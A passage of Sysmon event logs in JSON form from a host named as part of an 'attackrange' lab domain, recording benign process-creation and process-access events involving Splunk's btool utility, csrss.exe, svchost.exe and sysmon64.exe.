C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.695","ProcessGuid":"{41C8662E-1FF6-5F25-0000-0010B3870500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{41C8662E-1FF6-5F25-0000-0010F7860500}","ParentProcessId":"1632","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3560,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1FF6-5F25-0000-0010F7860500}\r\nSourceProcessId: 1632\r\nSourceThreadId: 4976\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-0010B3870500}\r\nTargetProcessId: 4948\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1FF6-5F25-0000-0010F7860500}","SourceProcessId":"1632","SourceThreadId":"4976","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-0010B3870500}","TargetProcessId":"4948","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3561,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-0010B3870500}\r\nTargetProcessId: 4948\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-0010B3870500}","TargetProcessId":"4948","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3562,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3563,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3564,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3565,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3566,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3567,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3568,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 